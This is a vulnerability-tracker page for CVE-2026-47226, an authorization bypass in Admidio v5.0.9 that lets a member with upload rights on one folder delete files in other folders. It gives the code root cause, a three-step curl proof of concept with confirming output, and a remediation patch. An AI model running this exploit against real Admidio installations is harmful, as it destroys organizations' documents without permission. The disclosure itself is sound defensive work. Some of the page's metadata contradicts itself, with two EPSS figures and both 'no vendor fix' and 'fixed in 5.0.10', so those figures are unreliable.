CVE-2026-47226

MEDIUMPre-NVD 6.56.5
EchelonGraph scoreLOW confidence

This medium-severity CVE scores 6.5 under the CNA's CVSS (NVD's own analysis pending). EPSS exploit probability: 0.0%, top 93% of all CVEs by exploit prediction. GitHub Security Advisory data not yet ingested — confidence will rise once GHSA publishes (typical lag: hours to days for open-source ecosystem CVEs; never for infrastructure-only CVEs).

Triggered by: NVD CVSS baseline
Sources: cna:github_m, epss
6.5
EchelonGraph verdictMonitorLow exploitation likelihood right now — keep watching.
  • Lower severity and no public exploit yet
CISA-KEV: Not listedEPSS: 0%CVSS: 6.5Exploit: NoneExposed: 0

No vendor fix yet — apply a workaround or compensating control (WAF / firewall / segmentation) and watch for a patch.

Admidio: Authorization bypass in file_delete enables cross-folder file removal by authenticated users without delete privileges

Summary

An authenticated Admidio member with upload rights on any one folder can permanently delete files from folders where they have only view access. The authorization check at the top of modules/documents-files.php evaluates upload rights against the attacker-supplied folder_uuid URL parameter — not the file's actual parent folder. The file_delete handler then only verifies view rights on the file's real location, never upload rights. By passing a folder they legitimately own in folder_uuid while targeting a file in a restricted folder via file_uuid, an attacker bypasses the upload-right check entirely and permanently deletes the file.

This is an incomplete fix of GHSA-rmpj-3x5m-9m5f, which was patched in v5.0.7 but remains exploitable in v5.0.9.

Affected Version: Admidio v5.0.9


Details

Root Cause File: modules/documents-files.php

Issue 1 — folder_uuid is not required for file_delete mode (line 67):

$getFolderUUID = admFuncVariableIsValid($_GET, 'folder_uuid', 'uuid', array(
    'requireValue' => !in_array($getMode, array('list', 'file_delete', 'download'))
));

Issue 2 — The top-level upload-right check loads the folder from the attacker-controlled URL parameter, not the file's actual parent folder (lines 79–88):

if ($getMode != 'list' && $getMode != 'download') {
    $folder = new Folder($gDb);
    $folder->getFolderForDownload($getFolderUUID);   // uses attacker-supplied UUID
    if (!$folder->hasUploadRight()) {
        $gMessage->show($gL10n->get('SYS_NO_RIGHTS'));
    }
}

Issue 3 — The file_delete handler only checks view rights via getFileForDownload(). Upload rights on the file's actual folder are never verified (lines 165–178):

case 'file_delete':
    SecurityUtils::validateCsrfToken($_POST['adm_csrf_token']);
    $file = new File($gDb);
    $file->getFileForDownload($getFileUUID);   // view-only check, not upload
    $file->delete();
    echo json_encode(array('status' => 'success'));
    break;

File::getFileForDownload() in src/Documents/Entity/File.php checks only view-role membership — it never verifies upload rights.


Attack Scenario

  • The organization has two folders: PrivateFolder (role A: view-only) and UploadFolder (role A: upload + view).
  • Attacker is a member of role A — they have legitimate upload access to UploadFolder only.
  • Attacker enumerates a file UUID in PrivateFolder using file_list mode, which is accessible to anyone with view rights.
  • Attacker sends a file_delete POST using UploadFolder's UUID in folder_uuid and the PrivateFolder file UUID in file_uuid.
  • Server checks upload rights against UploadFolderpasses.
  • Server deletes the file from PrivateFolder without ever checking upload rights there.

Prerequisites:

  • Authenticated Admidio member account
  • Upload rights on at least one folder (legitimately assigned)
  • View rights on the target folder (sufficient to enumerate file UUIDs via file_list mode)
  • Knowledge of a target file UUID (obtainable from the folder listing)


PoC

Step 1 — Authenticate and obtain login CSRF token:

curl -c /tmp/admidio_cookies.txt http://TARGET/system/login.php > /tmp/login.html

LOGIN_CSRF=$(grep -o 'name="adm_csrf_token"[^>]*value="[^"]*"' /tmp/login.html \ | grep -o 'value="[^"]*"' | cut -d'"' -f2)

curl -b /tmp/admidio_cookies.txt -c /tmp/admidio_cookies.txt \ -X POST "http://TARGET/system/login.php?mode=check" \ -d "usr_login_name=MEMBER&usr_password=PASSWORD&adm_csrf_token=${LOGIN_CSRF}"

Step 2 — Extract authenticated session CSRF token:

AUTH_CSRF=$(curl -s -b /tmp/admidio_cookies.txt \
  "http://TARGET/system/file_upload.php?module=documents_files&uuid=UPLOAD_FOLDER_UUID" \
  | grep -oP 'name:\s*"adm_csrf_token",\s*value:\s*"\K[^"]+')

Step 3 — Delete file from restricted folder using the upload folder UUID as bypass:

curl -b /tmp/admidio_cookies.txt \
  -X POST "http://TARGET/modules/documents-files.php?mode=file_delete&file_uuid=PRIVATE_FILE_UUID&folder_uuid=UPLOAD_FOLDER_UUID" \
  -d "adm_csrf_token=${AUTH_CSRF}"

Expected response: {"status":"success"}

Confirmed on Docker — Admidio v5.0.9 (admidio/admidio:v5.0.9):

[*] Login CSRF: qhlOt8RB12vIuzBYD4eUVDk1VlVKqN
[+] Authenticated as 'testmember'
[*] Operation CSRF: EacPuqIWUKVIb7PcVrMypikUrblhhn
[*] Sending file_delete for 93dc6280-4332-11f1-bba7-0242ac110003 via folder bypass...
[*] HTTP 200: {"status":"success"}

[!!!] VULNERABLE — file deleted without upload rights on target folder Deleted file UUID: 93dc6280-4332-11f1-bba7-0242ac110003

testmember holds upload rights only on UploadFolder. secret2.txt (UUID 93dc6280-...-bba7-...) resided in PrivateFolder and was permanently deleted from both the database and filesystem.


Impact

An authenticated Admidio member with legitimate upload access to any one folder can permanently delete files from any other folder to which they have view access — without authorization. In organizations where upload rights are delegated by role (e.g., team leads upload to their own folder, view-only everywhere else), this enables cross-folder sabotage and permanent destruction of shared documents.

Business Impact: Data loss, destruction of shared organizational documents, and compliance violations in organizations relying on Admidio for document management.

Remediation

In the file_delete handler, after loading the file via getFileForDownload(), verify upload rights against the file's actual parent folder — not the URL-supplied folder_uuid:

case 'file_delete':
    SecurityUtils::validateCsrfToken($_POST['adm_csrf_token']);
    $file = new File($gDb);
    $file->getFileForDownload($getFileUUID);

// Verify upload rights on the file's actual parent folder $parentFolder = new Folder($gDb); $parentFolder->readDataById((int)$file->getValue('fil_fol_id')); if (!$parentFolder->hasUploadRight()) { $gMessage->show($gL10n->get('SYS_NO_RIGHTS')); }

$file->delete(); echo json_encode(array('status' => 'success')); break;

Alternative fix: Remove the top-level folder_uuid check for file_delete entirely and move a proper upload-rights verification into the file_delete case as the sole authority for authorization.

Defense-in-depth recommendations:

  • Audit all other modes in documents-files.php (e.g., folder_delete, file_rename) for the same pattern of trusting folder_uuid from the URL instead of the resource's actual parent.
  • Add an integration test asserting a user with upload rights on Folder A cannot perform destructive operations on files in Folder B.
  • Consider centralizing authorization in a single helper (e.g., assertUploadRightOnFile($fileUuid)) to eliminate the URL-parameter trust-boundary issue across the codebase.


Credits

  • Researcher: Vishal Kumar B - https://github.com/VishaaLlKumaaRr - Security Researcher & Penetration Tester
  • Disclosure: Responsible disclosure to Admidio maintainers

Resources

CVSS v3
6.5
EG Score
6.5(low)
EPSS
7.3%
KEV
Not listed

Published

May 29, 2026

Last Modified

May 29, 2026

Vendor Advisories for CVE-2026-47226(1)

These vendors published their own advisory mentioning this CVE — often with vendor-specific remediation steps + affected product lists not in NVD.

Affected Packages

(1 across 1 ecosystem)
Packagist(1)
PackageVulnerable rangeFixed inDependents
admidio/admidio4.1.0 ... v5.0.9 (55 versions)5.0.10

Data Freshness Timeline

(refreshed 3× in last 7d / 15× in last 30d)

Each row is a source pipeline that fetched or updated this CVE on that date, with what changed. For example, "NVD update" means NVD published or revised its analysis for this CVE; "MITRE cvelistV5" means we ingested or refreshed it from the CNA feed. Most recent first.

  1. 2026-07-16 01:48 UTCEG score recompute
  2. 2026-07-14 13:51 UTCEG score recompute
  3. 2026-07-11 17:06 UTCEG score recompute
  4. 2026-07-08 17:15 UTCEG score recompute
  5. 2026-07-02 03:45 UTCEG score recompute
  6. 2026-07-01 01:17 UTCEG score recompute
  7. 2026-06-29 14:54 UTCEG score recompute
  8. 2026-06-28 16:54 UTCEG score recompute
  9. 2026-06-27 18:53 UTCEG score recompute
  10. 2026-06-26 20:52 UTCEG score recompute
  11. 2026-06-25 22:52 UTCEG score recompute
  12. 2026-06-25 00:48 UTCEG score recompute
  13. 2026-06-24 02:46 UTCEG score recompute
  14. 2026-06-18 22:21 UTCEG score recompute
  15. 2026-06-17 13:06 UTCEG score recompute
  16. 2026-06-16 15:04 UTCEG score recompute
  17. 2026-06-15 16:55 UTCEG score recompute
  18. 2026-06-14 23:18 UTCEPSS rescore
  19. 2026-06-14 18:54 UTCEG score recompute
  20. 2026-06-13 23:00 UTCEPSS rescore
  21. 2026-06-13 20:54 UTCEG score recompute
  22. 2026-06-12 23:12 UTCEPSS rescore
  23. 2026-06-12 22:52 UTCEG score recompute
  24. 2026-06-12 00:50 UTCEG score recompute
  25. 2026-06-11 02:50 UTCEG score recompute
Show 12 more
  1. 2026-06-10 04:48 UTCEG score recompute
  2. 2026-06-09 06:48 UTCEG score recompute
  3. 2026-06-08 08:47 UTCEG score recompute
  4. 2026-06-07 10:46 UTCEG score recompute
  5. 2026-06-06 12:46 UTCEG score recompute
  6. 2026-06-05 14:45 UTCEG score recompute
  7. 2026-06-04 16:44 UTCEG score recompute
  8. 2026-06-03 18:43 UTCEG score recompute
  9. 2026-06-02 20:42 UTCEG score recompute
  10. 2026-06-01 22:41 UTCEG score recompute
  11. 2026-06-01 00:41 UTCEG score recompute
  12. 2026-05-29 22:26 UTCEG score recompute

Frequently asked(5)

What is CVE-2026-47226?
CVE-2026-47226 is a medium vulnerability published on May 29, 2026. Admidio: Authorization bypass in file_delete enables cross-folder file removal by authenticated users without delete privileges Summary An authenticated Admidio member with upload rights on any one folder can permanently delete files from folders where they have only view access. The authorization…
When was CVE-2026-47226 disclosed?
CVE-2026-47226 was first published in the National Vulnerability Database on May 29, 2026. EchelonGraph re-ingests CVE updates from NVD on a 2-hour cycle, so this page reflects the latest published state.
Is CVE-2026-47226 actively exploited?
CVE-2026-47226 is not currently on CISA's Known Exploited Vulnerabilities catalog. FIRST EPSS estimates a 7.3% percentile likelihood of exploitation in the next 30 days — higher percentiles indicate greater predicted risk.
What is the CVSS score of CVE-2026-47226?
CVE-2026-47226 has a CVSS v4.0 base score of 6.5 (CNA self-assessment; NVD's own analysis pending). The EG score is currently aggregating — additional source signals are being incorporated as they become available..
How do I remediate CVE-2026-47226?
Patch to the fixed version published by the affected vendor. Where vendor advisories exist for CVE-2026-47226, EchelonGraph cross-links them in the Vendor Advisories panel below — those typically contain the canonical remediation steps, fixed version numbers, and any vendor-specific mitigations.

Dependency Blast Radius

See which npm, PyPI, Go, and Maven packages are affected by CVE-2026-47226

Explore →

Is Your Infrastructure Affected by CVE-2026-47226?

EchelonGraph automatically scans your cloud infrastructure and maps CVE exposure using blast radius analysis.